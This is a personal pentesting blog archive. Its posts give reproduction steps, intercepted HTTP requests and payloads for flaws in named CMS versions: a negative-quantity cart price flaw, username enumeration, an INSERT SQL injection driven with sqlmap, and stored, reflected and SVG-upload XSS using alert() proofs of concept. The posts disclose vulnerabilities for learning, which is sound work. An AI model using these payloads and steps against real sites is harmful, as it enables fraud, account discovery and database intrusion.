Monday 22 April 2024

Friday Fun Pentest Series - 5 - spa-cartcmsv1.9.0.6

Description

- It was found that the application suffers from business logic flaw

- Additionally the application is vulnerable to username enumeration on the login page


Logic Flaw

Steps to Reproduce:

  1. Checkout page and intercept HTTP POST request
  2. Add minus quantity such as -10
  3. The final price would come up as negative value

// HTTP POST request modifying the quantity to negative value

POST /cart/add HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 
[...]

productid=225&amount=-10


// HTTP response

HTTP/2 200 OK
Server: nginx
[...]

[...]
<img src="https://demo.spa-cart.com/var/photo/product/234x200/225/695/1.jpg" alt="" /><b>Five And Two Jewelry Piper Gold-Plated Earrings</b> added to cart
<br /><br />
<strong class="added_price">Price: <span><span class="currency">$</span>59.00</span></strong>
<div class="added_options">
<b>Selected options:</b>
Qty: 1<br />
Color: silver gold<br />
</div>
[...]


// HTTP GET request to checkout

GET /checkout HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 
[...]


// HTTP response showing negative amount owned

HTTP/2 200 OK
Server: nginx
[...]

[...]
\t<td>silver gold<\/td>\r\n<\/tr>\r\n<\/table>\r\n <\/td>\r\n <td class=\"line\" nowrap align=\"right\">\r\n<span class=\"currency\">$<\/span>59.00 x -10 = <span class=\"currency\">$<\/span>-590.00 <\/td>\r\n<\/tr>\r\n<\/table>\r\n\r\n<br \/>\r\n<hr \/>\r\n<br \/>\r\n<div class=\"checkout-guest-mobile\">\r Subtotal: <span class=\"currency\">$<\/span>-590.00<br \/><br \/>\r\nYou cannot order below $10.00<\/div>","Checkout",null,"checkout",null]
[...]
















Username Enumeration

Steps to Reproduce:
  1. Register account
  2. Enter valid account with wrong password
  3. Trap HTTP request
  4. Check that response for valid username has "P" message
  5. Enter invalid account with wrong password
  6. Check that response for invalid username has "E" message

// HTTP POST request with valid username and wrong password

POST /login HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
[...]

email=test%40test.test&password=test123


// HTTP response showing "P" error message

HTTP/2 200 OK
Server: nginx
[...]

P


// HTTP POST request with invalid username and wrong password

POST /login HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
[...]

email=test%40test.t3st&password=test123


// HTTP response showing "E" error message

HTTP/2 200 OK
Server: nginx
[...]

E

at No comments:

Wednesday 17 April 2024

Web Labs Finished

I am proud to say that have finally completed my labs for most common web vulnerabilities. Coded most in PHP and some in Python. Have included Hint button to describe the vulnerability and its mitigation.

  1. CORS and CSRF
    • CORS Information Leakage
    • CSRF Change Email Functionality
  2. Directory Traversal
    • Absolute Path Directory Traversal
    • Relative Path Directory Traversal
  3. XSS 
    • Stored XSS
    • Reflected XSS
    • DOM Reflected XSS
    • DOM Stored XSS
  4. XXE
    • OOB XXE
    • XXE File Retrieval
  5. SSTI
    • Python Jinja2
  6. IDOR
    • Username Identifiers
  7. SSRF
    • SSRF to Internal AWS Instance Information Leakage

Sample Screenshots of the Labs




at No comments:

Wednesday 10 April 2024

Friday Fun Pentest Series - 4 - Daily Expense Managerv1.0

 Description

- INSERT INTO SQL injection found in contact.php page

- SQLMap used to do automation


INSERT INTO SQL Injection

Steps to Reproduce:

  1. Visit contact us page
  2. Add word to e.g. "test" to "Message" parameter
  3. Place single quote to trigger the SQL injection error
  4. Automate the process using SQLMap

// HTTP POST request

POST /expensemanager/contact.php HTTP/1.1
Host: 192.168.166.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36
[...]

Name=test&Email=test%40test.test&Subject=tesst&Message=test%27%0D%0A


// HTTP response

HTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
[...]

[...]
<br />
<b>Fatal error</b>:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '')' at line 2 in C:\xampp\htdocs\expensemanager\contact.php:21
Stack trace:
#0 C:\xampp\htdocs\expensemanager\contact.php(21): mysqli_query(Object(mysqli), 'INSERT INTO fee...')
#1 {main}
  thrown in <b>C:\xampp\htdocs\expensemanager\contact.php</b> on line <b>21</b><br />
[...]


// SQLMap in action
sqlmap --dbms=mysql --threads 10 -r request.txt --level 5 --risk 3 --banner

[...]
[23:13:30] [INFO] testing MySQL
[23:13:30] [INFO] confirming MySQL
[23:13:30] [INFO] the back-end DBMS is MySQL
[23:13:30] [INFO] fetching banner
[23:13:30] [INFO] resumed: '10.4.32-MariaDB'
web application technology: Apache 2.4.58, PHP 8.2.12
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '10.4.32-MariaDB'
[...]


Conclusion

- Had lots of fun fuzzing the application

- Until next Friday!

- Cheers
at No comments:

Friday 15 March 2024

Friday Fun Pentest Series - 3 - concretecmsv9.2.7

 Description

- Open redirect

- Stored XSS

- Verbose error message (stack trace)

- Verbose error message (SQL error)


Verbose Error Message - Stack Trace

Steps to Reproduce:

    1. Directly browse to edit profile page
    2. Error should come up with verbose stack trace

    Verbose Error Message - SQL Error

    Steps to Reproduce:

      Page Settings > Design > Save Changes

      1. Intercept HTTP POST request and place single quote to "pTemplateID"
      2. Verbose SQL error message would occur


      Open Redirect

      Steps to Reproduce:

        1. Login to application
        2. Click to "Edit This Page" button
        3. Intercept HTTP GET request
        4. Enter relevant domain as value for "redirect" parameter


        Stored XSS

        Steps to Reproduce:

        1. Edit page
        2. Add HTML widget and drag it to the page
        3. Add XSS payload in the HTML editor window

        "><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">


        Conclusion

        - Had lots of fun fuzzing the application

        - Until next Friday!

        - Cheers

        at No comments:

        Saturday 9 March 2024

        Friday Fun Pentest Series - 2 - phpfusioncmsv9.10.30

        Description

        - Filter bypass

        - Four stored XSS in admin functionality


        Payload Used:

        "><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">


        Stored XSS #1

        Steps to Reproduce:

        1. Go to Content Admin > Blog > Add Blog
        2. In the Extended blog content field paste the XSS payload


        Stored XSS #2

        Steps to Reproduce:

        1. Go to Content Admin > Articles > Article
        2. In the Article field paste the XSS payload


        Stored XSS #3

        Steps to Reproduce:

        1. Go to Content Admin > News > Add News
        2. In the Snippet field paste the XSS payload


        Stored XSS #4

        Steps to Reproduce:

        1. Go to System Admin > Banners
        2. In the Banner 1 field paste the XSS payload 


        Conclusion

        - Had lots of fun fuzzing the application

        - Until next Friday!

        - Cheers

        at No comments:

        Saturday 2 March 2024

        Friday Fun Pentest Series - 1 - boidcmsv2.0.1

        BoidCMS v2.0.1

        Description

        - Stored XSS

        - Reflected XSS

        - XSS via SVG File Upload


        XSS via SVG File Upload

        Steps to Reproduce:

        1. Login with admin user
        2. Visit "Media" page
        3. Upload xss.svg
        4. Click "View" and XSS payload will execute

        // xss.svg contents

        <?xml version="1.0" standalone="no"?>
        <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

        <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
           <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
           <script type="text/javascript">
              alert(`XSS`);
           </script>
        </svg>


        Reflected XSS

        Steps to Reproduce:
        1. Login as admin
        2. Visit "Media" page
        3. Click "Delete" and intercept the HTTP GET request
        4. In "file" parameter add the payload "<script>alert(1)</script>"
        5. After forwarding the HTTP GET request a browser popup would surface

        Stored XSS

        Steps to Reproduce:
          1. Login as admin
          2. Visit "Settings" page
          3. Enter XSS payload in "Title", "Subtitle", "Footer"
          4. Then visit the blog page

          Conclusion

          - Had lots of fun fuzzing the application
          - Until next Friday!
          - Cheers

          at No comments:

          Friday 1 March 2024

          Friday Fun Pentest Series Introduction

           

          Decided to introduce a Friday Fun Pentest Series, where I would be pentesting various web apps in my lab to discover and explore vulnerabilities in the web app as well its code base. Then post the walkthroughs on my blog for anyone that would want to follow.

          at No comments:
          Subscribe to: Posts (Atom)

          Friday Fun Pentest Series - 5 - spa-cartcmsv1.9.0.6

          Description - It was found that the application suffers from business logic flaw - Additionally the application is vulnerable to username en...